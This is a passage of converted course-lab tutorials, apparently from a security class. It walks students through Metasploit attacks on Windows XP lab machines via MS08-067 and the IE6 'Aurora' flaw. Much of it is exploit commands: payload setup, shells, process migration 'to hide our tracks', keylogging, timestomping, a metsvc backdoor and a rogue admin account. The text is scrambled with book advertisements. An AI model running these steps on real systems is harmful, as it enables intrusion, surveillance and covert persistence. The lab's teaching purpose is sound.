Metasploit Tutorials For XP Operating System
Metasploit Tutorials For XP Operating System
(Metasploit windows/browser/ms10_002_aurora)
{ How To Crash Internet Exploder 6 }
Background Information
Metasploit Toolkit for
Reference Link: Penetration T...
David Maynor, Thom...
[Link] Best Price $10.80
[Link] or Buy New $43.05
Privacy Information
Internet Explorer "Aurora" Memory Corruption
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies.
The exploit code is a direct port of the public sample published to the
Wepawet malware analysis site. The technique used by this module is
currently identical to the public sample, as such, only Internet Explorer 6
can be reliably exploited.
Prerequisite
1. Login to your Instructor VM, as username administrator
For those of you that do not have access to my class, Instructor VM is a
Windows XP Operating System.
2. Download Metasploit
[Link]
Penetration Tester's
Open Source Too...
3. Login to your WindowsVulnerable01 VM, as username student Jeremy Faircloth, ...
Best Price $21.00
For those of you that do not have access to my class, Instructor VM is a or Buy New
Windows XP Operating System running Windows Explor[d]er 6.
Privacy Information
Privacy Information
converted by [Link]
Dissecting the Hack
Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78
Privacy Information
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
Privacy Information
Privacy Information
The payload is the actual code that will run on the target system after a
successful exploit attempt. Use the show payloads command to list all
payloads compatible with the current exploit. A Practical Guide to
Linux Commands,...
converted by [Link]
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
4. On WindowsVulnerable01, Bring up Windows Explorer 6 Best Price $2.11
or Buy New
Privacy Information
5. Place website address [Link] in the address
bar.
Click Go or press enter in the address text box in which your address is
located.
converted by [Link]
Beginning the Linux
Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
Proof of Lab
Solaris Operating
1. Cut and Paste a screen shot that looks similar to Step #6 in Section 4 into a Environment Boot C...
David Rhodes, Domi...
word document and upload to Moodle. Best Price $0.74
or Buy New
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00
Privacy Information
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Privacy Information
Buy New
Privacy Information
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ BackTrack5R1: Establishing A VNCShell & rdesktop to Victim Machine }
Metasploit Toolkit for
Penetration T...
Section 0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.
Metasploit
David Kennedy, Jim...
2. Lab Notes Best Price $26.80
or Buy New $27.87
In this lab we will do the following:
1. Use Metasploit to Exploit Damn Vulnerable WXP-SP2
2. Create Attacker Account on Damn Vulnerable WXP-SP2
Privacy Information
3. rdesktop to Damn Vulnerable WXP-SP2 using newly created Attacker
Account.
3. Legal Disclaimer
As a condition of your use of this Web site, you warrant to
[Link] that you will not use this Web site for any
BackTrack 4
purpose that is unlawful or that is prohibited by these terms, conditions, Shakeel Ali, Tedi ...
and notices. Best Price $40.00
In accordance with UCC § 2-316, this product is provided with "no or Buy New $47.48
Professional Penetration
Testing
Thomas Wilhelm
Section 1. Log into Damn Vulnerable WXP-SP2 Best Price $19.85
or Buy New $66.85
1. Start Up Damn Vulnerable WXP-SP2.
Instructions:
Privacy Information
1. Click on Damn Vulnerable WXP-SP2
2. Click on Edit virtual machine Settings
Note(FYI):
For those of you not part of my class, this is a Windows XP machine
running SP2.
converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New
Privacy Information
Privacy Information
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
converted by [Link]
Himanshu Dwivedi
2. Click on Play virtual machine Best Price $0.01
or Buy New $35.00
Privacy Information
Privacy Information
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
converted by [Link]
Beginning Ubuntu Linux
Keir Thomas, Andy ...
Best Price $6.98
or Buy New $29.19
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
converted by [Link]
1. Start Up BackTrack5R1.
Solaris Operating
Instructions: Environment Boot C...
1. Start Up your VMware Player David Rhodes, Domi...
2. Play virtual machine Best Price $0.74
or Buy New
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Privacy Information
converted by [Link]
1. Type startx
Buy New
Privacy Information
converted by [Link]
Section 3. Starting up the Metasploit MSF Console
1. Start Up Metasploit msfconsole
Instructions:
1. Applications --> Exploitation Tools --> Network Exploitation Tools -->
Metasploit Framework --> msfconsole.
Note(FYI):
Metasploit takes about 5 to 20 seconds to start up.
2. msfconsole screen
Note(FYI):
This is the msfconsole
converted by [Link]
3. Search for the MS08-067 Exploit
Instructions:
1. search ms08_067
converted by [Link]
5. Show Payloads
Instructions:
1. show payloads
6. Set Payloads
Instructions:
1. set PAYLOAD windows/vncinject/bind_tcp
2. Press <Enter>
Note:
This Payload will create a VNC Server/Shell Using TCP.
converted by [Link]
7. Show Options
Instructions:
1. show options
Note(FYI):
Notice the Required Column. RPORT and SMBPIPE are already populated,
but RHOST is not.
In the next step, you will populate RHOST with the IP Address of the
victim machine (Damn Vulnerable WXP-SP2).
converted by [Link]
Replace [Link] with the IP Address of Damn Vulnerable WXP-SP2
obtained from (Section 1, Step 6).
Instructions:
1. set RHOST [Link]
2. show options
The Victim's IP Address is now set.
converted by [Link]
10. Verify VNC TCP Connection
Instructions:
1. netstat -nao | findstr :4444
In my case, 1052 is the process ID for the VNC Metasploit session.
In your case it will be different.
Use your PID with the following command.
2. tasklist | findstr 1052
converted by [Link]
12. Open Control Panel
Instructions:
1. Start --> Control Panel
converted by [Link]
14. Allow Remote Desktop
Instructions:
1. Click on the Remote Tab
2. Check Allow Remote Assistance invitations to be sent from the computer.
3. Check Allow users to connect remotely to this computer
4. Click OK
converted by [Link]
We are going to test the hacker33 account that we just created on Damn
Vulnerable WXP-SP2.
converted by [Link]
1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login
screen
2. rdesktop -u hacker33 -p abc123 [Link]
converted by [Link]
Section 4. Proof of Lab
1. Proof of Lab
Instructions:
1. net user hacker33
2. date
Press enter twice.
3. echo "Your Name"
This should be your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a PrtScn
2. Past into a word document
3. Upload to Moodle.
converted by [Link]
2. Shutdown Damn Vulnerable WXP-SP2
Instructions:
1. shutdown -s -c "You've Been Hacked"
converted by [Link]
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
Section 1
1. Login to your Backtrack VM, as username student or administrator
For those of you that do not have access to my class, Instructor VM is a
Windows XP Operating System.
2. sudo su -
3. svn co [Link]
4. Either use "t" for temporally accept or "p" for permanently access. Penetration Tester's
I choose "p" because the CA is from godaddy, which is pretty reliable. Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New
Privacy Information
Privacy Information
converted by [Link]
Dissecting the Hack
Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78
Privacy Information
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Privacy Information
Privacy Information
converted by [Link]
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
Privacy Information
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
converted by [Link]
Beginning the Linux
Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30
Privacy Information
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00
Privacy Information
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Privacy Information
Buy New
Privacy Information
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: exploit/windows/browser/ms10_002_aurora)
{ exploit, migrate, keylogrecorder, scraper, metsvc }
Background Information
Metasploit Toolkit for
Reference Link: Penetration T...
David Maynor, Thom...
[Link] Best Price $10.80
[Link] or Buy New $43.05
[Link]
Privacy Information
Prerequisite
Privacy Information
1. Login to your WindowsVulnerable01 VM, as username administrator
For those of you that do not have access to my class, WindowVulnerable01 VM is a
Windows XP Operating System, that happens to have many vulnerabilities including
Windows Explorer 6.
Privacy Information
Professional Penetration
3. Login to your Instructor VM, as username administrator Testing
For those of you that do not have access to my class, Instructor VM is a Windows Thomas Wilhelm
Best Price $19.85
XP Operating System or Buy New $66.85
Privacy Information
4. On Instructor VM, obtain your IP Address
Command: Start --> Run --> CMD --> ipconfig
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New
converted by [Link]
Privacy Information
Section 1: Fire Up Metasploit Console
I. Note
If you prefer to use BackTrack's MSF Console Click Here, and continue to Section 2
to complete the rest of this lab.
If you prefer to use Window's MSF Console, please continue through Section 1.
1. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50
Privacy Information
Privacy Information
Privacy Information
Privacy Information
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
2. Command: use exploit/windows/browser/ms10_002_aurora or Buy New $35.00
This command will tell msf which exploit to load.
NOTE: Your command prompt will change.
Privacy Information
converted by [Link]
Section 3: Setting the payload
1. Command: show payloads
UNIX Shells by Example
The payload is the actual code that will run on the target system after a Ellie Quigley
successful exploit attempt. Use the show payloads command to list all payloads Best Price $22.88
compatible with the current exploit. or Buy New $35.78
Privacy Information
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
2. Command: set PAYLOAD windows/shell/bind_tcp
Privacy Information
Privacy Information
2. Command: set URIPATH aurora_exploit.html
This will be the name of the webpage file the mis-informed user with Windows
Exploder 6 will click on.
3. Command: exploit
Linux Administration
Notice how msf starts up a daemon listening on port 8080 for the victim to make a Wale Soyinka
connection by clicking on the web address Best Price $11.78
[Link] or Buy New $19.99
Privacy Information
Privacy Information
converted by [Link]
6. On the Instructor VM
Once the browser tries to load the page, you will see a msf message saying
'Sending Internet Explorer "Aurora" Memory Corruption to client [Link].' Practical Guide to
NOTE: That there is not a command shell session between Instructor ([Link]) Fedora and Red Ha...
Mark G. Sobell
and WindowsVulnerable01 ([Link]) Best Price $2.11
or Buy New
Privacy Information
Buy New
Privacy Information
converted by [Link]
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
.
Privacy Information
3. On the Instructor VM, let's interact with the interpreter by issuing the following
command
Command: sessions -i 2
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Privacy Information
2. On the Instructor VM, let's run keylogrecorder, by issuing the following command
Command: run keylogrecorder
NOTE: The first red rectangle displays that victim's [Link] process was
migrated to 1712
NOTE: The second rectangle shows where the keylogrecorder log file is located
on the Instructor VM.
C:/Documents and
Settings/Instructor/.msf3/logs/scripts/keylogrecorder/192.168.1.108_20110601.[Link] BSD UNIX Toolbox
Christopher Negus,...
Buy New
Privacy Information
converted by [Link]
3. On the WindowsVulnerable01 VM, bring up notepad
START --> RUN --> notepad
Once notepad comes up, type whatever you want. (See Below).
7. On the Instructor VM, let's look at the contents of the keylogrecorder log file.
Open the text file similarly named to the file above. This file will display the
key strokes that were typed in WindowVulnerable01's notepad during the recording
session.
converted by [Link]
2. On the Instructor VM, go back to my computer. We are not going to look at the
"scraper" log files.
In my computer, go to C:\Documents and
Settings\Instructor\.msf3\logs\scripts\scraper.
Notice all the various log files that are present.
converted by [Link]
5. File of Interest: [Link]
This is a very nice report that displays Product Name and Hardware components
converted by [Link]
File System Commands
System Commands
Notice you have the ability to drop to a shell, reboot the machine and
execute commands.
converted by [Link]
1. On the Instructor VM, find out what pid (process id) that you are connected too.
Command: getpid
2. On the Instructor VM, look for your pid using the ps command.
Command: ps
Notice my pid of 1712 matches up to [Link] which is the executable name
for Microsoft Internet Explorer 6.
3. On the Instructor VM, let's migrate from [Link] (pid = 1712) to [Link]
(pid = 636). Above you will see that the [Link]'s pid is 1712 and
[Link]'s pid is 636. Are goal is to make our process ([Link]) appears as
a typical looking process (like [Link]).
Command: migrate 636
Command: getpid
Now you have successfully attach the interpreter from [Link] to
[Link].
Why did we do this you ask? To hide our tracks of course.
4.
converted by [Link]
2. On the Instructor VM, type in notepad whatever you want.
Save this file directly under C:\
Name it aurora_exploit.txt
Keep in mind this is a non-malicious text file.
However, you could put some sort of trojan horse in its place.
converted by [Link]
5. On the Instructor VM, cd to C:\
Command: pwd
Will show you wehre you are
Command: cd ../../
In my case, I was in C:\WINDOWS\system32 and I only need to go back two
directories to get to C:\.
6. On the Instructor VM, use the "ls" command to see file as well.
Command: ls
Below you can see that aurora_exploit.txt is listed under WindowsVulnerable01 C:\.
Command: ?
The "?" will show you all the possible command.
converted by [Link]
8. On the Instructor VM, let's use timestomp to change the timestamp of
aurora_exploit.txt.
Command: timestomp help
Command: ls
Notice that aurora_exploit.txt and [Link] now have the same time stamp.
Why are we changing the timestamp? Hacker's know administrators are more
likely to spot a file with a recent timestamp as opposed to not delete a file
with a very old time stamp.
converted by [Link]
2. On the Instructor VM, we will use the "run metsvc" command to install a server on
WindowsVulnerable01.
Command: run metsvc
The backdoor will run on port 31337.
Command: ps
Look for the [Link] to verify the backdoor is in place.
Command: ipconfig
Just out of habit, re-verify the IP address of the victim computer
WindowsVulnerable01.
4. On the Instructor VM, we are going to test our newly created backdoor. So, totally
exit out of the msfconsole.
converted by [Link]
Command: exit
Command: exit
Command: exit -y
If using windows, your window will eventually close.
If using unix, it will drop you back to a command prompt.
5. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console
10. On the Instructor VM, let's connect to WindowVulnerable01 using the exploit command
Command: exploit
Congrats!!! You are connected!!!
converted by [Link]
11. On the Instructor VM, just to a basic "ps" command to look at the processes.
Command: ps
2. On the Instructor VM, do a screen print of Step 1, in Section 12 above and submit to
moodle.
converted by [Link]
Startup type: Disabled
Select the Stop Button
Select Apply and OK
5. On the WindowVulnerable01 VM, we will need to remove the metsvc registry keys.
Start --> Run --> regedit
Highlight My Computer
converted by [Link]
Go to Edit --> Find
converted by [Link]
7. On the WindowVulnerable01 VM, Reboot your machine
Proof of Lab
1. On the Instructor VM, do a screen print of Step 1, in Section 12 above and submit to
moodle.
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ Establishing A Shell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.
Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.
Privacy Information
Privacy Information
Penetration Tester's
Open Source Too...
4. startx Jeremy Faircloth, ...
converted by [Link]
Best Price $21.00
Issue the startx command if you are currently are only seeing a console and or Buy New
not a graphical user interface.
Privacy Information
Privacy Information
Privacy Information
2. ifconfig
Example: No IP Address for eth0
If a valid IP address for eth0 is not displayed please move onto step 3.
Privacy Information
converted by [Link]
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Privacy Information
3. vi /etc/network/interfaces
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
5. cd /etc/init.d/
Privacy Information
6. ./networking start
converted by [Link]
Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New
Privacy Information
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
Practical Guide to
Fedora and Red Ha...
3. Stop Firewall on Backtrack01 Mark G. Sobell
Best Price $2.11
or Buy New
1. Start Firestarter
System --> Firestarter
Privacy Information
Privacy Information
converted by [Link]
2. Click on Stop Firewall
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
converted by [Link]
6. Searching For Exploits
1. search ms08_067 (See Below)
Below we are searching for any exploits involving Microsoft Advisory MS08-
067.
Only one exploit is returned (windows/smb/ms08_067_netapi) HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
7. Using an exploit
HP-UX 11i Version 2
1. use windows/smb/ms08_067_netapi System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53
1. show payloads
Privacy Information
4. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.
converted by [Link]
5. set RHOST [Link]
Note: Use the IP Address of WindowsVulnerable01
9. Exploit
1. exploit
3. systeminfo
Proof of Lab: Issue a print screen for proof of lab then paste into a word
document.
converted by [Link]
4. As you can imagine you have pretty much can do anything you want. Let's just do
a simple shutdown.
Command: shutdown -r
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 9 into a
word document and upload to Moodle.
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ Using the MsfGUI to Grab A Shell and Transfer a File }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.
Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.
Privacy Information
Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.80
or Buy New $66.85
Privacy Information
3. Login to your Backtrack01 VM, as username root
converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New
Privacy Information
4. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.
Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
converted by [Link]
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Privacy Information
Privacy Information
3. vi /etc/network/interfaces
4. Your file should look similar to the below screen shot A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
Privacy Information
6. ./networking start
converted by [Link]
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
converted by [Link]
Privacy Information
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New
Privacy Information
Privacy Information
converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00
Privacy Information
2. Once the Msf-GUI Loads, you will a similar screen (See Below)
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Buy New
Privacy Information
converted by [Link]
3. Double click on ms08_067_netapi
converted by [Link]
6. Enter WindowsVulnerable01 IP Address into the RHOST text box (See Below)
Then Click Forward.
7. Run Exploit
Confirm Settings
Then Click Apply
converted by [Link]
7. Using the exploit to gain a command prompt
1. Verify Job is Complete
Once the exploit job completes, you will see a session has been established
to the victim IP Address.
converted by [Link]
3. Merry Christmas and A Happy Command line prompt
converted by [Link]
Click on All Users
Click on Desktop
2. Enter Filename
Call it "h@[Link]"
Select OK.
converted by [Link]
5. Enter text similar to the below.
Make Sure you include your name and date.
For Proof of Lab, do a screen print of this step and submit to Moodle.
converted by [Link]
11. Verify File Transfer
1. On WindowsVulnerable01
Search for h@[Link] on the desktop.
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #5 in Section 9 into a
word document and upload to Moodle.
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ Using the MsfCli to Grab A DOS Command Prompt }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. What is MSfCli? or Buy New $43.05
Metasploit Command Line Interface allows for exploits to be executed from
the Unix and Windows command line without the need to first launch the Privacy Information
msfconsole.
It is particularly useful when a large number of systems need to be tested
for the same vulnerability.
2. [Link]
The vulnerability could allow remote code execution if an affected system Metasploit
received a specially crafted RPC request. On Microsoft Windows 2000, Windows David Kennedy, Jim...
XP, and Windows Server 2003 systems, an attacker could exploit this Best Price $26.80
vulnerability without authentication to run arbitrary code. It is possible or Buy New $27.87
1. Prerequisite
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP BackTrack 4
Shakeel Ali, Tedi ...
machines that is vulnerable to the MS08-067 Vulnerability. Best Price $40.00
or Buy New $47.48
Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85
Privacy Information
Penetration Tester's
Open Source Too...
3. Login to your Backtrack01 VM, as username root Jeremy Faircloth, ...
converted by [Link]
Best Price $21.00
or Buy New
Privacy Information
Privacy Information
2. ifconfig
Example: No IP Address for eth0 Pro OpenSSH
If a valid IP address for eth0 is not displayed please move onto step 3. Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Example: Valid IP Address for eth0
converted by [Link]
Privacy Information
Privacy Information
A Practical Guide to
Linux Commands,...
Mark G. Sobell
3. vi /etc/network/interfaces Best Price $16.74
or Buy New
Privacy Information
Privacy Information
5. cd /etc/init.d/
Linux Administration
Wale Soyinka
6. ./networking start Best Price $11.78
converted by [Link]
or Buy New $19.99
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
Privacy Information
converted by [Link]
Unix and Linux System
Administration...
Evi Nemeth, Garth ...
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
2. Click on Stop Firewall
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New
Privacy Information
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22
Privacy Information
Privacy Information
converted by [Link]
HP-UX
2. Once MsfCli Loads, you will a similar screen (See Below) Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
Buy New
2. Basically, you will what Operating Systems are affected by the exploit, the
required options, and a brief description (See Below)
Privacy Information
converted by [Link]
1. Issue the below command (See Below)
Command: ./msfcli windows/smb/ms08_067_netapi P
2. You will see all the payloads that are associated with
windows/smb/ms08_067_netapi. (See Below)
2. You will see all the options for the particular payload for exploit
windows/smb/ms08_067_netapi. (See Below)
converted by [Link]
8. Executing Exploit from MsfCli Command line
1. Issue the below command (See Below)
./msfcli windows/smb/ms08_067_netapi PAYLOAD=windows/shell_bind_tcp
RHOST=[Link] E
"windows/smb/ms08_067_netapi" - is the MS08-067 exploit.
2. If exploit is successful, you will see the below Windows Command Line Interface.
converted by [Link]
3. From the Windows Command Line, issue both the date and time command (See Below).
Proof of Lab: Issue and screen print, paste into a word document, and upload
to Moodle.
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 8 into a
word document and upload to Moodle.
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US
(Metasploit: MS08-067)
{ Establishing A VNCShell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.
Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.
Privacy Information
Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85
Privacy Information
3. Login to your Backtrack01 VM, as username root
converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New
Privacy Information
4. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.
Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50
Privacy Information
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77
Privacy Information
converted by [Link]
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Privacy Information
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
Privacy Information
5. cd /etc/init.d/
Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New
6. ./networking start
converted by [Link]
Privacy Information
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99
Privacy Information
Privacy Information
Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New
Privacy Information
converted by [Link]
Best Price $18.89
or Buy New $23.30
Privacy Information
Buy New
Privacy Information
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
Privacy Information
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New
Privacy Information
Privacy Information
converted by [Link]
AIX for UNIX
Professionals
2. Once MSF Loads (See Below) Bonnie L. Miller
Best Price $5.62
or Buy New $58.00
Privacy Information
HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52
Privacy Information
6. Searching For Exploits
1. search ms08_067 (See Below)
Below we are searching for any exploits involving Microsoft Advisory MS08-
067.
Only one exploit is returned (windows/smb/ms08_067_netapi)
Privacy Information
7. Using an exploit
1. use windows/smb/ms08_067_netapi
1. show payloads
Privacy Information
converted by [Link]
3. set PAYLOAD windows/vncinject/bind_tcp
4. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.
2. Presto, The VNC Server is open and a VNC client session with a remote command
shell will be launched shortly.
converted by [Link]
3. VNC Shell Session
Proof of Lab:
From the remote command shell, type date and press enter twice.
Do a PrtScn, Cut and Paste into a word document, and Upload to Moodle.
converted by [Link]
10. Exploit a "locked" windows machine
converted by [Link]
3. Once MSF Loads (See Below)
4. show payloads
converted by [Link]
6. set PAYLOAD windows/shell_bind_tcp
7. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.
9. exploit
10. In the Metasploit Courtesy Shell, create a user and add to groups (See Below)
Command: net user hacker33 abc123 /add
Username: hacker33
